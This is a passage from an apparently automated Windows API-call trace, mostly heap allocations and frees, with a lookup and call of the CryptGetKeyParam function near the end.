(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0171.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.533] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0171.534] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0171.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.535] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0171.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0171.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0171.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.540] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0171.540] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2838, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2838*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: 